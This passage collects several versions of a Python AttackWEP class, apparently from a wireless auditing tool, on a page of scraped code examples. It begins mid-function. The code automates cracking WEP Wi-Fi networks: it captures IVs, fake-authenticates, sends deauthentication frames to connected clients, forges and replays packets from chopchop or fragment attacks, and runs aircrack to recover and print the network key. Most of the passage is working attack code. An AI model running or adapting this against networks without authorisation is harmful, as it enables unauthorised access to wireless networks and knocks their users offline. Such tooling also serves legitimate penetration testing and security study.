            Color.pl(' {R}failed{W}')
            if Configuration.require_fakeauth:
                # Fakeauth is requried, fail
                raise Exception(
                    'Fake-authenticate did not complete within' +
                    ' %d seconds' % AttackWEP.fakeauth_wait)
            else:
                # Warn that fakeauth failed
                Color.pl('{!} {O}' +
                    'unable to fake-authenticate with target' +
                    ' (%s){W}' % self.target.bssid)
                Color.pl('{!} continuing attacks because' +
                    ' {G}--require-fakeauth{W} was not set')
        return fakeauth
Example #6
0
class AttackWEP(Attack):
    '''
        Contains logic for attacking a WEP-encrypted access point.
    '''

    fakeauth_wait = 5

    def __init__(self, target):
        super(AttackWEP, self).__init__(target)
        self.crack_result = None
        self.success = False

    def run(self):
        '''
            Initiates full WEP attack.
            Including airodump-ng starting, cracking, etc.
            Returns: True if attack is succesful, false otherwise
        '''

        aircrack = None # Aircrack process, not started yet
        fakeauth_proc = None
        replay_file = None

        attacks_remaining = list(Configuration.wep_attacks)
        while len(attacks_remaining) > 0:
            attack_name = attacks_remaining.pop(0)
            # BIG try-catch to capture ctrl+c
            try:
                # Start Airodump process
                with Airodump(channel=self.target.channel,
                              target_bssid=self.target.bssid,
                              ivs_only=True, # Only capture IVs packets
                              skip_wash=True, # Don't check for WPS-compatibility
                              output_file_prefix='wep') as airodump:

                    Color.clear_line()
                    Color.p('\r{+} {O}waiting{W} for target to appear...')
                    airodump_target = self.wait_for_target(airodump)

                    fakeauth_proc = None
                    if self.fake_auth():
                        # We successfully authenticated!
                        # Use our interface's MAC address for the attacks.
                        client_mac = Interface.get_mac()
                        # Keep us authenticated
                        fakeauth_proc = Aireplay(self.target, "fakeauth")
                    elif len(airodump_target.clients) == 0:
                        # Failed to fakeauth, can't use our MAC.
                        # And there are no associated clients. Use one and tell the user.
                        Color.pl('{!} {O}there are no associated clients{W}')
                        Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' +
                                 ' without fake-authentication or associated clients{W}')
                        client_mac = None
                    else:
                        # Fakeauth failed, but we can re-use an existing client
                        client_mac = airodump_target.clients[0].station

                    # Convert to WEPAttackType.
                    wep_attack_type = WEPAttackType(attack_name)

                    # Start Aireplay process.
                    aireplay = Aireplay(self.target,
                                        wep_attack_type,
                                        client_mac=client_mac)

                    time_unchanged_ivs = time.time() # Timestamp when IVs last changed
                    previous_ivs = 0

                    # Loop until attack completes.

                    while True:
                        airodump_target = self.wait_for_target(airodump)
                        status = "%d/{C}%d{W} IVs" % (airodump_target.ivs, Configuration.wep_crack_at_ivs)
                        if fakeauth_proc:
                            if fakeauth_proc and fakeauth_proc.status:
                                status += ", {G}fakeauth{W}"
                            else:
                                status += ", {R}no-auth{W}"
                        if aireplay.status is not None:
                            status += ", %s" % aireplay.status
                        Color.clear_entire_line()
                        Color.pattack("WEP",
                                airodump_target,
                                "%s attack" % attack_name,
                                status)

                        #self.aircrack_check()

                        # Check if we cracked it.
                        if aircrack and aircrack.is_cracked():
                            (hex_key, ascii_key) = aircrack.get_key_hex_ascii()
                            bssid = airodump_target.bssid
                            if airodump_target.essid_known:
                                essid = airodump_target.essid
                            else:
                                essid = None
                            Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n'
                                % attack_name)
                            if aireplay: aireplay.stop()
                            if fakeauth_proc: fakeauth_proc.stop()
                            self.crack_result = CrackResultWEP(self.target.bssid,
                                    self.target.essid, hex_key, ascii_key)
                            self.crack_result.dump()
                            self.success = True
                            return self.success

                        if aircrack and aircrack.is_running():
                            # Aircrack is running in the background.
                            Color.p("and {C}cracking{W}")

                        # Check number of IVs, crack if necessary
                        if airodump_target.ivs > Configuration.wep_crack_at_ivs:
                            if not aircrack:
                                # Aircrack hasn't started yet. Start it.
                                ivs_file = airodump.find_files(endswith='.ivs')[0]
                                aircrack = Aircrack(ivs_file)

                            elif not aircrack.is_running():
                                # Aircrack stopped running.
                                Color.pl('\n{!} {O}aircrack stopped running!{W}')
                                ivs_file = airodump.find_files(endswith='.ivs')[0]
                                Color.pl('{+} {C}aircrack{W} stopped, restarting...')
                                self.fake_auth()
                                aircrack = Aircrack(ivs_file)

                            elif Configuration.wep_restart_aircrack > 0 and \
                                    aircrack.pid.running_time() > Configuration.wep_restart_aircrack:
                                # Restart aircrack after X seconds
                                aircrack.stop()
                                ivs_file = airodump.find_files(endswith='.ivs')[0]
                                Color.pl('\n{+} {C}aircrack{W} ran for more than' +
                                         ' {C}%d{W} seconds, restarting'
                                             % Configuration.wep_restart_aircrack)
                                aircrack = Aircrack(ivs_file)


                        if not aireplay.is_running():
                            # Some Aireplay attacks loop infinitely
                            if attack_name == 'chopchop' or attack_name == 'fragment':
                                # We expect these to stop once a .xor is created, or if the process failed.

                                replay_file = None

                                # Check for .xor file.
                                xor_file = Aireplay.get_xor()
                                if not xor_file:
                                    # If .xor is not there, the process failed.
                                    Color.pl('\n{!} {O}%s attack{R} did not generate' % attack_name +
                                             ' a .xor file{W}')
                                    # XXX: For debugging
                                    Color.pl('{?} {O}Command: {R}%s{W}' % aireplay.cmd)
                                    Color.pl('{?} {O}Output:\n{R}%s{W}' % aireplay.get_output())
                                    break

                                # If .xor exists, run packetforge-ng to create .cap
                                Color.pl('\n{+} {C}%s attack{W}' % attack_name +
                                        ' generated a {C}.xor file{W}, {G}forging...{W}')
                                replay_file = Aireplay.forge_packet(xor_file,
                                                                   airodump_target.bssid,
                                                                   client_mac)
                                if replay_file:
                                    Color.pl('{+} {C}forged packet{W},' +
                                             ' {G}replaying...{W}')
                                    wep_attack_type = WEPAttackType("forgedreplay")
                                    attack_name = "forgedreplay"
                                    aireplay = Aireplay(self.target,
                                                        'forgedreplay',
                                                        client_mac=client_mac,
                                                        replay_file=replay_file)
                                    continue
                                else:
                                    # Failed to forge packet. drop out
                                    break
                            else:
                                Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}')
                                Color.pl('{?} {O}Command: {R}%s{W}' % aireplay.cmd)
                                Color.pl('{?} {O}Output:\n%s{W}' % aireplay.get_output())
                                break # Continue to other attacks

                        # Check if IVs stopped flowing (same for > N seconds)
                        if airodump_target.ivs > previous_ivs:
                            time_unchanged_ivs = time.time()
                        elif Configuration.wep_restart_stale_ivs > 0 and \
                             attack_name != 'chopchop' and \
                             attack_name != 'fragment':
                            stale_seconds = time.time() - time_unchanged_ivs
                            if stale_seconds > Configuration.wep_restart_stale_ivs:
                                # No new IVs within threshold, restart aireplay
                                aireplay.stop()
                                Color.pl('\n{!} restarting {C}aireplay{W} after' +
                                         ' {C}%d{W} seconds of no new IVs'
                                             % stale_seconds)
                                aireplay = Aireplay(self.target, \
                                                    wep_attack_type, \
                                                    client_mac=client_mac, \
                                                    replay_file=replay_file)
                                time_unchanged_ivs = time.time()
                        previous_ivs = airodump_target.ivs

                        time.sleep(1)
                        continue
                    # End of big while loop
                # End of with-airodump
            except KeyboardInterrupt:
                if fakeauth_proc: fakeauth_proc.stop()
                if len(attacks_remaining) == 0:
                    self.success = False
                    return self.success
                if self.user_wants_to_stop(attack_name, attacks_remaining, airodump_target):
                    self.success = False
                    return self.success
            except Exception as e:
                Color.pl("\n{+} {R}Error: {O}%s{W}" % e)
                continue
            # End of big try-catch
        # End of for-each-attack-type loop

        self.success = False
        return self.success

    def user_wants_to_stop(self, current_attack, attacks_remaining, target):
        '''
            Ask user what attack to perform next (re-orders attacks_remaining, returns False),
            or if we should stop attacking this target (returns True).
        '''
        target_name = target.essid if target.essid_known else target.bssid

        Color.pl("\n\n{!} {O}Interrupted")
        Color.pl("{+} {W}Next steps:")

        # Deauth clients & retry
        attack_index = 1
        Color.pl("     {G}1{W}: {O}Deauth clients{W} and {G}retry{W} {C}%s attack{W} against {G}%s{W}" % (current_attack, target_name))

        # Move onto a different WEP attack
        for attack_name in attacks_remaining:
            attack_index += 1
            Color.pl("     {G}%d{W}: Start new {C}%s attack{W} against {G}%s{W}" % (attack_index, attack_name, target_name))

        # Stop attacking entirely
        attack_index += 1
        Color.pl("     {G}%d{W}: {R}Stop attacking, {O}Move onto next target{W}" % attack_index)
        while True:
            answer = raw_input(Color.s("{?} Select an option ({G}1-%d{W}): " % attack_index))
            if not answer.isdigit() or int(answer) < 1 or int(answer) > attack_index:
                Color.pl("{!} {R}Invalid input: {O}Must enter a number between {G}1-%d{W}" % attack_index)
                continue
            answer = int(answer)
            break

        if answer == 1:
            # Deauth clients & retry
            deauth_count = 1
            Color.clear_entire_line()
            Color.p("\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...")
            Aireplay.deauth(target.bssid, essid=target.essid)
            for client in target.clients:
                Color.clear_entire_line()
                Color.p("\r{+} {O}Deauthenticating client {C}%s{W}..." % client.station)
                Aireplay.deauth(target.bssid, client_mac=client.station, essid=target.essid)
                deauth_count += 1
            Color.clear_entire_line()
            Color.pl("\r{+} Sent {C}%d {O}deauths{W}" % deauth_count)
            # Re-insert current attack to top of list of attacks remaining
            attacks_remaining.insert(0, current_attack)
            return False # Don't stop
        elif answer == attack_index:
            return True # Stop attacking
        elif answer > 1:
            # User selected specific attack: Re-order attacks based on desired next-step
            attacks_remaining.insert(0, attacks_remaining.pop(answer-2))
            return False # Don't stop

    def fake_auth(self):
        '''
            Attempts to fake-authenticate with target.
            Returns: True if successful,
                     False is unsuccesful.
        '''
        Color.p('\r{+} attempting {G}fake-authentication{W} with {C}%s{W}...' % self.target.bssid)
        fakeauth = Aireplay.fakeauth(self.target, timeout=AttackWEP.fakeauth_wait)
        if fakeauth:
            Color.pl(' {G}success{W}')
        else:
            Color.pl(' {R}failed{W}')
            if Configuration.require_fakeauth:
                # Fakeauth is requried, fail
                raise Exception(
                    'Fake-authenticate did not complete within' +
                    ' %d seconds' % AttackWEP.fakeauth_wait)
            else:
                # Warn that fakeauth failed
                Color.pl('{!} {O}' +
                    'unable to fake-authenticate with target' +
                    ' (%s){W}' % self.target.bssid)
                Color.pl('{!} continuing attacks because' +
                    ' {G}--require-fakeauth{W} was not set')
        return fakeauth
Example #7
0
    def run(self):
        '''
            Initiates full WEP attack.
            Including airodump-ng starting, cracking, etc.
            Returns: True if attack is succesful, false otherwise
        '''
        # First, start Airodump process
        with Airodump(channel=self.target.channel,
                      target_bssid=self.target.bssid,
                      ivs_only=True, # Only capture IVs packets
                      output_file_prefix='wep') as airodump:

            Color.clear_line()
            Color.p('\r{+} {O}waiting{W} for target to appear...')
            airodump_target = self.wait_for_target(airodump)

            if self.fake_auth():
                # We successfully authenticated!
                # Use our interface's MAC address for the attacks.
                client_mac = Interface.get_mac()
            elif len(airodump_target.clients) == 0:
                # There are no associated clients. Warn user.
                Color.pl('{!} {O}there are no associated clients{W}')
                Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' +
                         ' without fake-authentication or associated clients{W}')
                client_mac = None
            else:
                client_mac = airodump_target.clients[0].station

            aircrack = None # Aircrack process, not started yet

            for attack_name in Configuration.wep_attacks:
                # Convert to WEPAttackType.
                wep_attack_type = WEPAttackType(attack_name)

                replay_file = None
                # Start Aireplay process.
                aireplay = Aireplay(self.target, \
                                    wep_attack_type, \
                                    client_mac=client_mac, \
                                    replay_file=replay_file)

                time_unchanged_ivs = time.time() # Timestamp when IVs last changed
                previous_ivs = 0

                # Loop until attack completes.
                while True:
                    airodump_target = self.wait_for_target(airodump)
                    Color.p('\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) '
                        % (attack_name, airodump_target.ivs))

                    # Check if we cracked it.
                    if aircrack and aircrack.is_cracked():
                        (hex_key, ascii_key) = aircrack.get_key_hex_ascii()
                        bssid = airodump_target.bssid
                        if airodump_target.essid_known:
                            essid = airodump_target.essid
                        else:
                            essid = None
                        Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n'
                            % attack_name)
                        if aireplay:
                            aireplay.stop()
                        self.crack_result = CrackResultWEP(bssid, \
                                                           essid, \
                                                           hex_key, \
                                                           ascii_key)
                        self.crack_result.dump()
                        self.success = True
                        return self.success

                    if aircrack and aircrack.is_running():
                        # Aircrack is running in the background.
                        Color.p('and {C}cracking{W}')

                    # Check number of IVs, crack if necessary
                    if airodump_target.ivs > Configuration.wep_crack_at_ivs:
                        if not aircrack:
                            # Aircrack hasn't started yet. Start it.
                            ivs_file = airodump.find_files(endswith='.ivs')[0]
                            aircrack = Aircrack(ivs_file)

                        elif not aircrack.is_running():
                            # Aircrack stopped running.
                            Color.pl('\n{!} {O}aircrack stopped running!{W}')
                            ivs_file = airodump.find_files(endswith='.ivs')[0]
                            Color.pl('{+} {C}aircrack{W} stopped,' +
                                     ' restarting {C}aircrack{W}')
                            aircrack = Aircrack(ivs_file)

                        elif aircrack.is_running() and \
                             Configuration.wep_restart_aircrack > 0:
                            # Restart aircrack after X seconds
                            if aircrack.pid.running_time() > Configuration.wep_restart_aircrack:
                                aircrack.stop()
                                ivs_file = airodump.find_files(endswith='.ivs')[0]
                                Color.pl('\n{+} {C}aircrack{W} ran for more than' +
                                         ' {C}%d{W} seconds, restarting'
                                             % Configuration.wep_restart_aircrack)
                                aircrack = Aircrack(ivs_file)


                    if not aireplay.is_running():
                        # Some Aireplay attacks loop infinitely
                        if attack_name == 'chopchop' or attack_name == 'fragment':
                            # We expect these to stop once a .xor is created,
                            #    or if the process failed.

                            replay_file = None

                            # Check for .xor file.
                            xor_file = Aireplay.get_xor()
                            if not xor_file:
                                # If .xor is not there, the process failed.
                                Color.pl('\n{!} {O}%s attack{R} did not generate' +
                                         ' a .xor file{W}' % attack_name)
                                # XXX: For debugging
                                Color.pl('\noutput:\n')
                                Color.pl(aireplay.get_output())
                                Color.pl('')
                                break

                            # If .xor exists, run packetforge-ng to create .cap
                            Color.pl('\n{+} {C}%s attack{W}' % attack_name +
                                    ' generated a {C}.xor file{W}, {G}forging...{W}')
                            forge_file = Aireplay.forge_packet(xor_file,
                                                               airodump_target.bssid,
                                                               client_mac)
                            if forge_file:
                                replay_file = forge_file
                                Color.pl('{+} {C}forged packet{W},' +
                                         ' {G}replaying...{W}')
                                attack_name = 'forged arp replay'
                                aireplay = Aireplay(self.target, \
                                                    'forgedreplay', \
                                                    client_mac=client_mac, \
                                                    replay_file=replay_file)
                                continue
                            else:
                                # Failed to forge packet. drop out
                                break
                        else:
                            Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}')
                            Color.pl('\naireplay.get_output():')
                            Color.pl(aireplay.get_output())
                            break # Continue to other attacks

                    # Check if IVs stopped flowing (same for > N seconds)
                    if airodump_target.ivs > previous_ivs:
                        time_unchanged_ivs = time.time()
                    elif Configuration.wep_restart_stale_ivs > 0 and \
                         attack_name != 'chopchop' and \
                         attack_name != 'fragment':
                        stale_seconds = time.time() - time_unchanged_ivs
                        if stale_seconds > Configuration.wep_restart_stale_ivs:
                            # No new IVs within threshold, restart aireplay
                            aireplay.stop()
                            Color.pl('\n{!} restarting {C}aireplay{W} after' +
                                     ' {C}%d{W} seconds of no new IVs'
                                         % stale_seconds)
                            aireplay = Aireplay(self.target, \
                                                wep_attack_type, \
                                                client_mac=client_mac)
                            time_unchanged_ivs = time.time()
                    previous_ivs = airodump_target.ivs

                    time.sleep(1)
                    continue
                # End of big while loop
            # End of for-each-attack-type loop
        # End of with-airodump

        self.success = False
        return self.success
Example #8
0
class AttackWEP(Attack):
    '''
        Contains logic for attacking a WEP-encrypted access point.
    '''

    fakeauth_wait = 5

    def __init__(self, target):
        super(AttackWEP, self).__init__(target)
        self.crack_result = None
        self.success = False

    def run(self):
        '''
            Initiates full WEP attack.
            Including airodump-ng starting, cracking, etc.
            Returns: True if attack is succesful, false otherwise
        '''

        aircrack = None  # Aircrack process, not started yet

        for (attack_index,
             attack_name) in enumerate(Configuration.wep_attacks):
            # BIG try-catch to capture ctrl+c
            try:
                # Start Airodump process
                with Airodump(
                        channel=self.target.channel,
                        target_bssid=self.target.bssid,
                        ivs_only=True,  # Only capture IVs packets
                        skip_wash=True,  # Don't check for WPS-compatibility
                        output_file_prefix='wep') as airodump:

                    Color.clear_line()
                    Color.p('\r{+} {O}waiting{W} for target to appear...')
                    airodump_target = self.wait_for_target(airodump)

                    if self.fake_auth():
                        # We successfully authenticated!
                        # Use our interface's MAC address for the attacks.
                        client_mac = Interface.get_mac()
                    elif len(airodump_target.clients) == 0:
                        # There are no associated clients. Warn user.
                        Color.pl('{!} {O}there are no associated clients{W}')
                        Color.pl(
                            '{!} {R}WARNING: {O}many attacks will not succeed'
                            +
                            ' without fake-authentication or associated clients{W}'
                        )
                        client_mac = None
                    else:
                        client_mac = airodump_target.clients[0].station

                    # Convert to WEPAttackType.
                    wep_attack_type = WEPAttackType(attack_name)

                    replay_file = None
                    # Start Aireplay process.
                    aireplay = Aireplay(self.target, \
                                        wep_attack_type, \
                                        client_mac=client_mac, \
                                        replay_file=replay_file)

                    time_unchanged_ivs = time.time(
                    )  # Timestamp when IVs last changed
                    previous_ivs = 0

                    # Loop until attack completes.

                    while True:
                        airodump_target = self.wait_for_target(airodump)
                        Color.p(
                            '\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) '
                            % (attack_name, airodump_target.ivs))

                        # Check if we cracked it.
                        if aircrack and aircrack.is_cracked():
                            (hex_key, ascii_key) = aircrack.get_key_hex_ascii()
                            bssid = airodump_target.bssid
                            if airodump_target.essid_known:
                                essid = airodump_target.essid
                            else:
                                essid = None
                            Color.pl(
                                '\n{+} {C}%s{W} WEP attack {G}successful{W}\n'
                                % attack_name)
                            if aireplay:
                                aireplay.stop()
                            self.crack_result = CrackResultWEP(bssid, \
                                                               essid, \
                                                               hex_key, \
                                                               ascii_key)
                            self.crack_result.dump()
                            self.success = True
                            return self.success

                        if aircrack and aircrack.is_running():
                            # Aircrack is running in the background.
                            Color.p('and {C}cracking{W}')

                        # Check number of IVs, crack if necessary
                        if airodump_target.ivs > Configuration.wep_crack_at_ivs:
                            if not aircrack:
                                # Aircrack hasn't started yet. Start it.
                                ivs_file = airodump.find_files(
                                    endswith='.ivs')[0]
                                aircrack = Aircrack(ivs_file)

                            elif not aircrack.is_running():
                                # Aircrack stopped running.
                                Color.pl(
                                    '\n{!} {O}aircrack stopped running!{W}')
                                ivs_file = airodump.find_files(
                                    endswith='.ivs')[0]
                                Color.pl('{+} {C}aircrack{W} stopped,' +
                                         ' restarting {C}aircrack{W}')
                                aircrack = Aircrack(ivs_file)

                            elif aircrack.is_running() and \
                                 Configuration.wep_restart_aircrack > 0:
                                # Restart aircrack after X seconds
                                if aircrack.pid.running_time(
                                ) > Configuration.wep_restart_aircrack:
                                    aircrack.stop()
                                    ivs_file = airodump.find_files(
                                        endswith='.ivs')[0]
                                    Color.pl(
                                        '\n{+} {C}aircrack{W} ran for more than'
                                        + ' {C}%d{W} seconds, restarting' %
                                        Configuration.wep_restart_aircrack)
                                    aircrack = Aircrack(ivs_file)

                        if not aireplay.is_running():
                            # Some Aireplay attacks loop infinitely
                            if attack_name == 'chopchop' or attack_name == 'fragment':
                                # We expect these to stop once a .xor is created,
                                #    or if the process failed.

                                replay_file = None

                                # Check for .xor file.
                                xor_file = Aireplay.get_xor()
                                if not xor_file:
                                    # If .xor is not there, the process failed.
                                    Color.pl(
                                        '\n{!} {O}%s attack{R} did not generate'
                                        % attack_name + ' a .xor file{W}')
                                    # XXX: For debugging
                                    Color.pl('\noutput:\n')
                                    Color.pl(aireplay.get_output())
                                    Color.pl('')
                                    break

                                # If .xor exists, run packetforge-ng to create .cap
                                Color.pl(
                                    '\n{+} {C}%s attack{W}' % attack_name +
                                    ' generated a {C}.xor file{W}, {G}forging...{W}'
                                )
                                forge_file = Aireplay.forge_packet(
                                    xor_file, airodump_target.bssid,
                                    client_mac)
                                if forge_file:
                                    replay_file = forge_file
                                    Color.pl('{+} {C}forged packet{W},' +
                                             ' {G}replaying...{W}')
                                    attack_name = 'forged arp replay'
                                    aireplay = Aireplay(self.target, \
                                                        'forgedreplay', \
                                                        client_mac=client_mac, \
                                                        replay_file=replay_file)
                                    continue
                                else:
                                    # Failed to forge packet. drop out
                                    break
                            else:
                                Color.pl(
                                    '\n{!} {O}aireplay-ng exited unexpectedly{W}'
                                )
                                Color.pl('\naireplay.get_output():')
                                Color.pl(aireplay.get_output())
                                break  # Continue to other attacks

                        # Check if IVs stopped flowing (same for > N seconds)
                        if airodump_target.ivs > previous_ivs:
                            time_unchanged_ivs = time.time()
                        elif Configuration.wep_restart_stale_ivs > 0 and \
                             attack_name != 'chopchop' and \
                             attack_name != 'fragment':
                            stale_seconds = time.time() - time_unchanged_ivs
                            if stale_seconds > Configuration.wep_restart_stale_ivs:
                                # No new IVs within threshold, restart aireplay
                                aireplay.stop()
                                Color.pl(
                                    '\n{!} restarting {C}aireplay{W} after' +
                                    ' {C}%d{W} seconds of no new IVs' %
                                    stale_seconds)
                                aireplay = Aireplay(self.target, \
                                                    wep_attack_type, \
                                                    client_mac=client_mac)
                                time_unchanged_ivs = time.time()
                        previous_ivs = airodump_target.ivs

                        time.sleep(1)
                        continue
                    # End of big while loop
                # End of with-airodump
            except KeyboardInterrupt:
                if not self.user_wants_to_continue(attack_index):
                    self.success = False
                    return self.success
            # End of big try-catch
        # End of for-each-attack-type loop

        self.success = False
        return self.success

    def user_wants_to_continue(self, attack_index):
        ''' Asks user if attacks should continue using remaining methods '''
        Color.pl('\n{!} {O}interrupted{W}\n')

        if attack_index + 1 >= len(Configuration.wep_attacks):
            # No more WEP attacks to perform.
            return False

        attacks_remaining = Configuration.wep_attacks[attack_index + 1:]
        Color.pl("{+} {G}%d{W} attacks remain ({C}%s{W})" %
                 (len(attacks_remaining), ', '.join(attacks_remaining)))
        prompt = Color.s('{+} type {G}c{W} to {G}continue{W}' +
                         ' or {R}s{W} to {R}stop{W}: ')
        if raw_input(prompt).lower().startswith('s'):
            return False
        else:
            return True

    def fake_auth(self):
        '''
            Attempts to fake-authenticate with target.
            Returns: True if successful,
                     False is unsuccesful.
        '''
        Color.p('\r{+} attempting {G}fake-authentication{W} with {C}%s{W}...' %
                self.target.bssid)
        start_time = time.time()
        aireplay = Aireplay(self.target, 'fakeauth')
        process_failed = False
        while aireplay.is_running():
            if int(time.time() - start_time) > AttackWEP.fakeauth_wait:
                aireplay.stop()
                process_failed = True
                break
            time.sleep(0.1)

        # Check if fake-auth was successful
        if process_failed:
            fakeauth = False
        else:
            output = aireplay.get_output()
            fakeauth = 'association successful' in output.lower()

        if fakeauth:
            Color.pl(' {G}success{W}')
        else:
            Color.pl(' {R}failed{W}')
            if Configuration.require_fakeauth:
                # Fakeauth is requried, fail
                raise Exception('Fake-authenticate did not complete within' +
                                ' %d seconds' % AttackWEP.fakeauth_wait)
            else:
                # Warn that fakeauth failed
                Color.pl('{!} {O}' +
                         'unable to fake-authenticate with target' +
                         ' (%s){W}' % self.target.bssid)
                Color.pl('{!} continuing attacks because' +
                         ' {G}--require-fakeauth{W} was not set')
        return fakeauth